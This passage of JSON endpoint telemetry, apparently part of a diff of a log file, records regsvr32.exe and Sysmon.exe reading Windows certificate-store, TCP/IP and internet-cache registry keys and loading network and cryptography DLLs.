"C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", - "registry_value": "ROOT", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT", - "registry_value": "ROOT", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot", - "registry_value": "AuthRoot", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\SmartCardRoot", - "registry_value": "SmartCardRoot", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", - "registry_value": "Root", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", - "registry_value": "CA", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wininet.dll", - "image_path": "C:\\Windows\\System32\\wininet.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238400000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "schannel.dll", - "image_path": "C:\\Windows\\System32\\schannel.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238700016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL", - "registry_value": "SCHANNEL", - "timestamp": 131883573238700016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "mskeyprotect.dll", - "image_path": "C:\\Windows\\System32\\mskeyprotect.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cryptnet.dll", - "image_path": "C:\\Windows\\System32\\cryptnet.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573238869984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - 